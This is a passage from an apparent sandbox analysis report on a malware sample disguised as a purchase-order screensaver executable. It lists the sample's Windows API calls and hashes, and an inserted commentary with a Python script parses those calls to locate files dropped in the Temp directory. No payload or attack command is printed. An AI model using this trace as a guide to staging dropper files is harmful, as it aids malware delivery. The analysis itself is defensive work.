                                                                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                                                                      • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                      • String ID: XZ
                                                                                                      • API String ID: 334405425-1418392395
                                                                                                      • Opcode ID: a8461a16ac82fd46328c3b40fe1928024aef525999e2dd49edf51c7c032d1790
                                                                                                      • Instruction ID: 409458e37c45ac75b59f5eb787cb01d488d5b476e6d1706a1798d0305ac83909
                                                                                                      • Opcode Fuzzy Hash: a8461a16ac82fd46328c3b40fe1928024aef525999e2dd49edf51c7c032d1790
                                                                                                      • Instruction Fuzzy Hash: A221C571904215F6CF206FA5CE48ADEBAB4AB04358F70427BF610B51E0D7B98E41DA6E
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 00405C01
                                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405C1C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CountFileNameTempTick
                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                      • API String ID: 1716503409-1857211195
                                                                                                      • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                                                                      • Instruction ID: 094b443934c56d738417ad06ce23117a41e39d67b54f0ae1535361756efc6c0b
                                                                                                      • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                                                                      • Instruction Fuzzy Hash: 45F09676A04208BBDB009F59DC05E9BB7B8EB91710F10803AEA01E7151E2B0AD448B54
                                                                                                      APIs
                                                                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 0040623F
                                                                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406253
                                                                                                        • Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406266
                                                                                                      • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00403347
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Char$Next$CreateDirectoryPrev
                                                                                                      • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                      • API String ID: 4115351271-3512041753
                                                                                                      • Opcode ID: bbd1dcb3637595afbe6b96ae3bcfafd58112e7b3325432cb54e87bfcccc6df60
                                                                                                      • Instruction ID: 64a45b222adfb8bd76fd8b495f2d7cf88aee328212c381153bc1e0c9699f7593
                                                                                                      • Opcode Fuzzy Hash: bbd1dcb3637595afbe6b96ae3bcfafd58112e7b3325432cb54e87bfcccc6df60
                                                                                                      • Instruction Fuzzy Hash: 22D0C92251AA3135C551372A7D06FCF295C8F0A329F12A477F809B90C2CB7C2A8249FE
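The function entries above (GetModuleHandleW/LoadLibraryExW/FreeLibrary of the nsl791D.tmp\System.dll plugin, GetTempFileNameW with the "nsa" prefix, CreateDirectoryW under %LOCALAPPDATA%\Temp) are the NSIS stub's drop logic, and the same "API.MODULE(args), ref: ADDRESS" line layout repeats for every function in this report. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses that line layout into records, separates direct calls from "Part of subcall function" entries, pulls every drive-letter path out of the argument lists, and flags direct file-creating calls whose path lies under the Temp directory. The five sample lines are constructed from the entries visible above; the FILE_CREATING_APIS set (only CreateDirectoryW and GetTempFileNameW occur in this report) and the argument splitting on commas are assumptions of the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: five "APIs" lines in the shape the report uses
# (API.MODULE(args), ref: ADDRESS, with "Part of subcall function" for
# indirect calls). The paths are the ones shown in the report above.
SAMPLE = r"""
• GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
  • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000), ref: 0040522A
• LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405C1C
• CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403347
"""

API_LINE = re.compile(
    r"^\s*[•*-]?\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# A Windows drive path runs until the next argument separator or paren.
WIN_PATH = re.compile(r"[A-Za-z]:\\[^,()]*")

# Assumption: APIs whose arguments name a path being created on disk.
# Only CreateDirectoryW and GetTempFileNameW appear in this report; the
# CreateFile variants are added so the check generalises to other dumps.
FILE_CREATING_APIS = {
    "CreateDirectoryW", "CreateDirectoryA",
    "GetTempFileNameW", "GetTempFileNameA",
    "CreateFileW", "CreateFileA",
}
TEMP_MARKER = "\\appdata\\local\\temp\\"


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str]  # address of the callee when the call is indirect

    @property
    def direct(self) -> bool:
        return self.subcall_of is None


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn the report's bullet lines into ApiCall records; lines that do
    not match the layout (headers, blank lines) are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             m.group("ref").upper(), m.group("sub")))
    return calls


def windows_paths(calls: List[ApiCall]) -> List[str]:
    """Every drive-letter path named in any argument, de-duplicated, in
    first-seen order. The 'Skipped: ' prefix is left out by WIN_PATH."""
    seen, out = set(), []
    for c in calls:
        for p in WIN_PATH.findall(",".join(c.args)):
            if p not in seen:
                seen.add(p)
                out.append(p)
    return out


def writes_under_temp(calls: List[ApiCall]) -> List[Tuple[str, str, str]]:
    """(api, path, ref) for direct file-creating calls whose path sits
    under %LOCALAPPDATA%\\Temp, the drop location this stub uses."""
    hits = []
    for c in calls:
        if not c.direct or c.api not in FILE_CREATING_APIS:
            continue
        for p in WIN_PATH.findall(",".join(c.args)):
            if TEMP_MARKER in p.lower():
                hits.append((c.api, p, c.ref))
    return hits


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE)
    for c in calls:
        kind = "subcall" if c.subcall_of else "direct"
        print(f"{c.ref} {kind:7} {c.api}.{c.module} ({len(c.args)} args)")
    print("paths:", windows_paths(calls))
    print("temp writes:", writes_under_temp(calls))
```

Feed it the "APIs" blocks of a whole report (one text blob is enough, since non-matching lines are ignored) and the path list plus the Temp-directory hits give a quick inventory of where the stub stages its plugin DLL and payload before the rest of the chain runs. Arguments are split on commas, which is safe for the report's hex values and paths but would break on a string argument that itself contains a comma.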
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                                                                      • Instruction ID: dca007468fed7c27dd914b546e5ea1ac9ab056a0c62ecf1bea7b7831388965f7
                                                                                                      • Opcode Fuzzy Hash: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                                                                      • Instruction Fuzzy Hash: 58A14471E00229DBDF28CFA8C8447ADBBB1FF48305F15816AD856BB281C7785A96CF44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                                                                      • Instruction ID: e31ab10654d3133c4bbe562e0396aaf9f668a3464ceaf5ac7e335a669e1e1d03
                                                                                                      • Opcode Fuzzy Hash: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                                                                      • Instruction Fuzzy Hash: 8E912371E00228CBEF28CF98C8587ADBBB1FF44305F15816AD856BB291C7785A96DF44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                                                                      • Instruction ID: e0c60a541a5106e25e0a2f50f35f038ee2aa27f15edb78bccdd8f3c871378321
                                                                                                      • Opcode Fuzzy Hash: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                                                                      • Instruction Fuzzy Hash: 2C814471D04228DFDF24CFA8C8487ADBBB1FB45305F25816AD456BB281C7789A96CF44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                                                                      • Instruction ID: c1f18cc480c27d0a28c5d6dc1e8cd9b1e5e62e2ab7f78041d4dc85e199002e6a
                                                                                                      • Opcode Fuzzy Hash: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                                                                      • Instruction Fuzzy Hash: 9B816731D04228DBDF24CFA8C8487ADBBB1FB44305F25816AD856BB2C1C7785A96DF84
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                                                                      • Instruction ID: 317a4f11872e46a6f39a96627fb546a7164eb21cb9e645d400dda74b69288846
                                                                                                      • Opcode Fuzzy Hash: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                                                                      • Instruction Fuzzy Hash: 48713471D04228DFEF24CFA8C8447ADBBB1FB48305F15816AD856BB281C7785A96DF44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                                                                      • Instruction ID: 7b464a411068ed62169f7738ff9b09ef3af2f2625e32a791141ed05019b82bd1
                                                                                                      • Opcode Fuzzy Hash: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                                                                      • Instruction Fuzzy Hash: A4714571E04228DFEF28CF98C8447ADBBB1FB48301F15816AD456BB281C7785996DF44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                                                                      • Instruction ID: 924b227091e8338000478ad755e115b80dfeef44851b3a3b0f99ac33e872c674
                                                                                                      • Opcode Fuzzy Hash: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                                                                      • Instruction Fuzzy Hash: 07713571E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                                                                      APIs
                                                                                                      • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                                                      • WriteFile.KERNELBASE(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$PointerWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 539440098-0
                                                                                                      • Opcode ID: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
                                                                                                      • Instruction ID: e0bff1d0cfda9ca41153e72f66d50dbc15cd376e58f7be5246e1248deba32b17
                                                                                                      • Opcode Fuzzy Hash: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
                                                                                                      • Instruction Fuzzy Hash: A2315971504218EBDF20CF65ED45A9F3FB8EB08755F20807AF904EA1A0D3349E40DBA9
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2232296174.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2232279863.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2232310367.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2232326142.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_10000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnumErrorLastWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 14984897-0
                                                                                                      • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                      • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                                                                      • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                      • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                                                                      APIs
                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
